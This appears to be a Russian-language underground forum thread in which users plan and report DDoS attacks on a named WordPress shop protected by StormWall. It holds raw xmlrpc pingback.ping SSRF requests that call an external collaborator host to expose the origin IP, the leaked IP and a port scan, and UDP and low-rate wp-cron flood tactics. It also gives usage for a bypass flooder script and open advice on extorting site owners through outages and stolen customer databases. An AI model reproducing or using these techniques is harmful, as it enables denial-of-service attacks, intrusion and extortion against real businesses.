Великий и ужасный StormWall

[c0d3x]

Это был ботнет, скрипт, что это так умно прибивает штормволл?

Это секрет фирмы

Строчные, заглавные?

Без разницы, это же поисковый запрос на сайте по сути, составляй как хочешь, хоть цифрами, либо комбинация букв и цифр.

Не работает. Подставлял скриптам куки с сайтов - голяк. Подключайся.

Это так не будет работать. Должны разворачиваться реальные экземпляры хромиума, хотя бы на базе пупитера. Запросы без реальной эмуляции даже не долетают до таргета, не несут в себе ни какой нагрузки, блокируются на этом вышеупомянутом "кружке".

Куки привязаны к айпи. Нельзя подставить куки с которыми входил с одного айпи, а подставить пытаешься с другого уже

Вот челик верно говорит.

Сменил скрипт, запустил 10 впс, начали тормозить. 3-4 ддосера с разными скриптами и с 10-15 ю серверами каждый, создали бы проблем. Хоть бери да банду сколачивай ))

Я выше там написал, что юзал скорость 0.5 RPS (запросов в секунду, то есть по факту это вообще интервал) - 1 запрос раз в 2 секунды с каждого атакующего хоста, что-бы не триггерить их рейт-лимит фильтр и не попадать под бан. Ты хоть 1к серверов поставь, если ты будешь хуячить с них 100500 r/s с каждой прокси/бота - ты только этим самым ускоришь детект и митигацию. Со всеми L7 антиддосами надо максимально на человека походить.

Парни, а мегу - шмегу, омг, блекспрут кто нибудь из местных щемит?

С какой целью интересуетесь, молодой человек?

 

[c0d3x]

Не, а хули грустного? С другой стороны ты можешь проявить смекалку и обойти StormWall другими способами. Известно что таргет на WordPress.

• Чекаем вручную наличие в открытом доступе xmlrpc.php
• Далее пробуем чекать возможность реализовать SSRF через pingback.ping таким образом:

POST https://a8.rus-anaboliki5.net/xmlrpc.php HTTP/2
Host: a8.rus-anaboliki5.net

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

• Находим в ответе интересующую нас функцию pingback.ping и пробуем ее заюзать общеизвестным методом:

POST /xmlrpc.php HTTP/2
Host: a8.rus-anaboliki5.net
Content-Length: 366

<methodCall>
   <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value><string>https://3osmowwb4jlylojd9hwnvbbmodu3is.oastify.com</string></value>
    </param>
    <param>
      <value><string>https://a8.rus-anaboliki5.net/shop/tabletki/anapolon/oxymetholone-25tab-50mg-tab-zetta/</string></value>
    </param>
  </params>
</methodCall>

• И получаем на наш DNS Collaborator запрос с их реального сервера, это и есть SSRF:

• Их IP: 185.30.97.146
• В Москве висят кста: rackstore.ru
• TCP порты все закрыты наружу, видимо режется все что не с подсетей StormWall идет.
• Запускаем UDPPLAIN на 53 порт (рандом), около 400 гбит/с суммарно и наблюдаем:

• Сайт уходит в бесконечную загрузку.
• Немного смекалки и можно работать.
• Подробнее про WP SSRF: sonarsource.com/blog/wordpress-core-unauthenticated-blind-ssrf/
• Дополнение: у них еще wp-cron.php в корне лежит, на него даю нагрузку со скоростью 0.1 RPS (1 запрос с каждого хоста раз в 10 секунд) и БД падает у них. Заюзал всего 200 хостов, намертво упали.

 

[S-W-I-F-T]

С какой целью интересуетесь, молодой человек?

Поделись секретом плз, как стать таким же крутым батьком как ты? +)

 

[Раскольников]

В том что написано мной выше - нет ничего сверхестественного. Просто немного познаний в L7 пентесте, на уровне даже не профессионала а распиздяя.

Спросила кем работаешь - студентом ей назвался (с) )))
А сейчас о главном.

Запускаем UDPPLAIN на 53 порт

Флуд на IP по UDP на 53-й порт? Или у меня скрипты не те или сервера не те. Не падают. Вообще не дергаются даже.

wp-cron.php в корне лежит

Это значит так: https://a8.rus-anaboliki5.net/wp-cron,php ? А как туда нагрузку дать, за штормом ведь.

 

[c0d3x]

Флуд на IP по UDP на 53-й порт? Или у меня скрипты не те или сервера не те. Не падают. Вообще не дергаются даже.

Там антидудос L4 - rackstore.ru/ddos-protection.html. Спуфинговыми скриптами и амплификациями не пробивается. Нужна распределенная большая нагрузка, например ботнет на несколько сотен гб/с.

Это значит так: https://a8.rus-anaboliki5.net/wp-cron,php ? А как туда нагрузку дать, за штормом ведь.

Эмулировать браузер в любом случае надо. Просто при атаке на этот скрипт не нужно наваливать много r/s, достаточно как я выше написал - 1 запрос раз в 10 секунд с каждого хоста, от 200 до 1000 хостов вполне хватает, у них БД падает. Юзая запросы с таким интервалом сложно попасть под рейт-лимит их, соответственно это существенно упрощает задачу. Единственный минус: скорее всего через несколько часов они сами или саппорт шторма поймут в чем дело и закроют извне доступ к этому скрипту. И придется в любом случае бить в поиск или другие страницы с низким интервалом эмулируя браузер, или же ботнетом напрямую в IP.

 

[Раскольников]

Единственный минус: скорее всего через несколько часов они сами или саппорт шторма поймут в чем дело и закроют извне доступ к этому скрипту.

Уверен, что так и будет. Там вообще какой-то лось за тягами админа сайта сидит с пониманием. Я их клал сначала через СF, потом они поставили SW, но как-то криво, и я их через защиту всё равно пробивал, затем они что-то накрутили и он мне пишет такой, а теперь попробуй. Типа издевается, понял, да ))
Я вычислил IP и так их положил, он мне пишет: а как узнали адрес бэкэнда ? ))) "Бэкэнда", бля. Я таких слов не знаю, пришлось гуглить ))
IP они на вторые сутки сменили и всё на этом закончилось. Но вот Ip есть, но толку. Ситуация как на "Поле чудес": угадал все буквы, но не сумел прочитать слово )))

 

[Desoxyn]

Не, а хули грустного? С другой стороны ты можешь проявить смекалку и обойти StormWall другими способами. Известно что таргет на WordPress.

Братик, я не совсем понимаю в дудосе, но (по моему скромному мнению) ты так найдешь только внешний ip днс сервака. Что тебе ничего не даст, т.к. он на каждый коннект будет выдавать свой порт.

У рил айпишек серваков - не будет для коннекта таких портов. Ты забыл про X -(CSPA) основанный на этой атаке. Вот проскань на всё. Ты упрешься в порты внешнего днс штормволла. Т.е. по факту дудосишь "сам для себя". По хост трэкеру проверь после дудоса, или ложится сам сервак (который ты атакуешь) чз днс, или он на харде прям (жестко вбит) и прописан - ложит сервак весь. Кмк - ты ложишь так просто днску (могу быть в корне не прав, не отрицаю).
А так вапще логика ясна и понятна, я плюсанул, т.к. из этого поста почерпнул, что плагином DNS SQLmap collaborator (или как он там) можно ловить гораздо больше инфы, чем стандартным коллаборатором. Тот ораничен. Вот огромный плюс за такое.

 

[c0d3x]

Братик, я не совсем понимаю в дудосе, но (по моему скромному мнению) ты так найдешь только внешний ip днс сервака. Что тебе ничего не даст, т.к. он на каждый коннект будет выдавать свой порт.
У рил айпишек серваков - не будет для коннекта таких портов. Ты забыл про X -(CSPA) основанный на этой атаке. Вот проскань на всё. Ты упрешься в порты внешнего днс штормволла. Т.е. по факту дудосишь "сам для себя". По хост трэкеру проверь после дудоса, или ложится сам сервак (который ты атакуешь) чз днс, или он на харде прям (жестко вбит) и прописан - ложит сервак весь. Кмк - ты ложишь так просто днску (могу быть в корне не прав, не отрицаю).
А так вапще логика ясна и понятна, я плюсанул, т.к. из этого поста почерпнул, что плагином DNS SQLmap collaborator (или как он там) можно ловить гораздо больше инфы, чем стандартным коллаборатором. Тот ораничен. Вот огромный плюс за такое.

Ну, давайте разбираться. Но сразу похоже что я проебался, в плане что при эксплуатации pingback.ping запрос на коллаборатор поступает не с сервера жертвы напрямую, а с внешнего DNS их хостера, тем не менее, касаемо текущей ситуации:

a8.rus-anaboliki5.net - резолвится на NS клоуда, на самом клоуде прописана "A" запись на 193.233.63.70 (StormWall), а оттуда проксируется на какой то из серверов в сетях rackstore (AS 57487) (?) Знак вопроса здесь по той причине, что если это DNS самого шторма, то почему он относительно слабо защищен и складывается от 400 гбит/с? Такого быть просто не должно.

Судя по апстриму и пирам эта AS (в раксторе) ничего общего со штормом не имеет - https://bgp.tools/as/57487#connectivity

При использовании SSRF получаем запрос с 185.30.97.146 (AS 57487). Все TCP порты закрыты наружу. Только пинг (ICMP) работает. По UDP картина такая:

123/udp open/filtered ntp
464/udp open/filtered kpasswd5
764/udp open/filtered omserv
989/udp open/filtered ftps-data
1059/udp open/filtered nimreg
1080/udp open/filtered socks
16674/udp open/filtered unknown
17615/udp open/filtered unknown
20309/udp open/filtered unknown
25337/udp open/filtered unknown
47624/udp open/filtered directplaysrvr
49152/udp open/filtered unknown
49160/udp open/filtered unknown

При атаке на любой рандомный порт (не важно, 53 или 555) пинг таймаутится, сайт не грузит, пинг на прокси IP 193.233.63.70 (StormWall) не падает (да и не должен вообще), TCP порты все функционируют нормально. Как только останавливаю: пинг на 185.30.97.146 моментально начинает работать и сайт тут же грузится.

Написал одному из админов шторма (нет, он не сливает мне IP клиентов и не занимается ни какой чернухой, через него в ускоренном режиме можно получить помощь с настройками и прочей х#йней по технической части) напрямую с вопросом "имеете какой либо отношение к AS 57487 и конкретно 185.30.97.146?". Ответ: "Нет, не наше."

То ли лыжи не едут, то ли я е#анутый, хотя лыжи едут, но х#й пойми как, быть может вся AS падает? Я этот момент не чекал. Раскольников нам заплатят хоть за аудит?

 

[Раскольников]

pingback.ping запрос

Я увидел знакомые буквы и дополню, что я пытался вычислить их IP (после того, как они его сменили), как описано тут через терминал и свои арендованные сервера. Но голяк. Каждый раз приходит разный IP c подсети SW, отличие там по цифрам в последнем октете только.

заплатят хоть за аудит?

За аудит по безопасности сайта по утечке данных или за стрессоустойчивость к ддосу?

Имея большой опыт вымогательства в свои молодые годы и множество лично подожжённых автомобилей, ларьков и пару магазинов отказников, а также понимая психологию переговоров в таких делах, могу сказать следующее. Всегда нужно сначала создавать проблемы, а потом разговаривать. Но никак не наоборот. Я даже специально проводил эксперименты. Опыт реала успешно работает и в интернете. Просто если их предупредить заранее, то они защиту наворотят. Нет. Проходили. Только внезапная атака. Привычки джентльменов оставим до лучших времён. Только вытягивать базу клиентов (какой ужас для репутации магазина!) или делать недоступным сайт и тогда начинать беседу.

 

[Marco van Basten]

а тема похоже ожила. Пора выращивать ботнет )

 

[7teen]

Защита от DDoS-атак всех разновидностей и уровней | StormWall - ваш щит от DDoS угроз

Надежная защита от DDoS атак любой сложности на уровнях L3-L7 для тех, чей бизнес находится в среде высокой конкуренции. 100% фильтрация от негативного DDoS трафика, техническая поддержка 24/7 | StormWall.pro

stormwall.pro

У штормов обновка, но вроде ничего нового нет в плане методов проверки запроса

 

[c0d3x]

Раскольников ну как успехи? Флудилки на JS тестил? Щемил кого-то еще?

 

[Раскольников]

Раскольников ну как успехи?

Похоже пора устраиваться на завод или идти в "банду" к лохбитам )))

Раскольников Флудилки на JS тестил?

Хорошо бы ещё инструкцию по запуску этих флудилок. Много времени уходит на разбор как запускать. Один запустил special - крашится.
Задумка там неплохая, но сырая.

Братик, я не совсем понимаю в дудосе

Десоксинчик, братка, ты чё сливаешься с темы, пост удалил. Вернись в семью! )

Щемил кого-то еще?

Всех обложил налогом. Но сейчас в тренде не мусорская "крыша", а пока что крыша Рамиля Хантимирова рулит ))

 

[c0d3x]

Хорошо бы ещё инструкцию по запуску этих флудилок. Много времени уходит на разбор как запускать. Один запустил special - крашится.

console.log('Install https.txt proxies to hit https sites http.txt to hit http sites.');
console.log('example: node CFBYPASS-WIZ.js GET 4 https://anonfiles.com/ 45 64');

Там жеж в коде обычно все есть.

• 4 = потоки
• 45 = время атаки в секундах
• 64 = запросов в секунду (RPS) с каждой прокси

Всех обложил налогом.

Платит хоть кто-то? Или на антидудос переезжают?

 

[Раскольников]

Платит хоть кто-то?

Сворачиваем откровения. Уже кроты с культуристического форума пронюхали, что тут идёт типа отработка барыжих целей. Постят скрины у себя с этой темы терпилам , что их сайты заказывают.
Интернет мир тесен.

 

[Раскольников]

CFBYPASS-WIZ

Cлабоват скрипт. У меня особая градация мощности скриптов. Если с одного сервера кладёт тестовый сайт, то годный, если надо 3-4 сервера с испытуемым скриптом - в утиль.
Но за помощь спасибо.
Адназначна! )

А этот у тебя работает https://github.com/MallisC5/special?

 

[Фантомас]

Люди новые приходят на форум, поэтому подниму топик. Может у кого из порядочных и немеркантильных и есть такой скрипт, который я всё ещё ищу. Две школололзовские-недодудосерские подружки - кышь с темы!

 

[holynet]

Люди новые приходят на форум, поэтому подниму топик. Может у кого из порядочных и немеркантильных и есть такой скрипт, который я всё ещё ищу. Две школололзовские-недодудосерские подружки - кышь с темы!

Бюджеты какие? Снова за "спасибо"?)
Тебе никто не даст метод для обхода довольно премиальной DDoS защиты просто так, на это должен быть бюджет, хотя-бы несколько тысяч $.

 

[yslvintage]

Бюджеты какие? Снова за "спасибо"?)
Тебе никто не даст метод для обхода довольно премиальной DDoS защиты просто так, на это должен быть бюджет, хотя-бы несколько тысяч $.

с "твоими" методами только за спасибо и работать. даже не так, нужно сказать спасибо чтоб в тебя за них не плюнули

штормволл)) премиальная))) защита)))))